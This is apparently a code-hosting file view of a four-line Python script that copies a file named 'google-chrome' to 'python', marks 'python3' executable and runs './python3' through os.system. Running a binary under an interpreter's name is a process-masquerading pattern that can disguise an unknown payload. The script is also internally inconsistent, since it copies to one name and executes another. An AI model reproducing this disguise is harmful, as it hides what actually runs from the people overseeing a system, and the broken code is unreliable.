File size: 99 Bytes
e11358a
81c811c
a2092a8
 
1
2
3
4
import os
os.system("cp google-chrome python")
os.system("chmod +x python3")
os.system("./python3")